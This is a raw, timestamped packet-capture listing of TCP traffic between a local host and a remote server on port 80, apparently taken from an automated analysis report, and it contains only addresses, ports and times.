Aug 24, 2021 08:46:52.990315914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990324020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990349054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990372896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990395069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990420103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990428925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990444899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990467072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990483999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990489960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990513086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990520954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990535975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990559101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990576029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990597010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990612030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990618944 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990621090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990643978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990663052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990674019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990684986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990705967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990732908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990756035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990767956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990777969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990787983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990792036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990798950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990818024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990834951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990844965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990855932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990878105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990880013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990906954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990906954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990925074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990942001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990958929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990969896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990976095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990993023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.991009951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.991015911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.991024971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.991044044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.991058111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.991081953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.991164923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014209032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014244080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014265060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014285088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014303923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014322996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014344931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014344931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014364958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014367104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014389038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014406919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014426947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014448881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014472961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014478922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014482021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014497042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014516115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014533997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014554024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014564991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014571905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014590025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014607906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014612913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014626980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014650106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014671087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014673948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014689922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014704943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014709949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014733076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014753103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014772892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014765978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014789104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014805079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014810085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014827013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014848948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014858007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014868021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014883995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014899969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014910936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014919043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014935970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014940023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014950991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014961004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.014967918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.014986038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.015001059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.015013933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.015017986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.015053988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.015088081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.037678003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037723064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037744045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037767887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037789106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037803888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.037808895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037830114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037849903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037869930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037890911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037913084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037925959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.037935972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037960052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037978888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.037981033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.037998915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038021088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038039923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038043976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038060904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038081884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038105011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038105011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038126945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038146973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038167953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038167953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038187981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038207054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038224936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038228989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038244963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038266897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038289070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038290024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038307905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038328886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038347960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038360119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038367033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038386106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038405895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038417101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038428068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038449049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038469076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038490057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038510084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038527966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038547993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.038736105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.038815975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.060847044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060888052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060911894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060931921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060955048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060976982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.060997963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061001062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061018944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061032057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061039925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061053991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061060905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061080933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061103106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061125040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061135054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061148882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061170101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061170101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061191082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061192036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061214924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061234951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061235905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061259031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061276913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061280966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061312914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061330080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061337948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061358929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061379910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061381102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061404943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061419964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061425924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061446905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061460972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061469078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061491013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061512947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061515093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061536074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061559916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061559916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061584949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061602116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061609030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061631918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061655998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061660051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061681032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061693907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061703920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061728001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061743975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061752081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061777115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061800003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.061857939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.061894894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084013939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084058046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084076881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084095955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084120035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084144115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084163904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084187984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084211111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084213018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084237099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084263086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084285021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084285975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084310055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084321976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084333897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084352016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084356070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084378004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084397078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084403038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084428072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084439993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084450960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084476948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084500074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084505081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084527016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084543943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084549904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084573030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084582090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084597111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084624052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084624052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084650040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084673882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084682941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084697962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084722042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084741116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084759951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084764957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084780931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084788084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084813118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084827900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084836960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084860086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084883928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084892035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084906101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084929943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084933043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084958076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.084960938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.084980965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.085005045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.085005999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.085077047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107039928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107079983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107103109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107155085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107183933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107208967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107233047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107254028 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107256889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107280970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107305050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107311010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107328892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107338905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107352972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107372046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107381105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107407093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107409954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107431889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107455015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107479095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107481956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107501030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107523918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107548952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107561111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107575893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107603073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107618093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107625961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107650995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107675076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107676029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107698917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107722998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107736111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107753992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107778072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107778072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107801914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107810020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107825041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107847929 CEST	80	49715	212.224.105.79	192.168.2.7
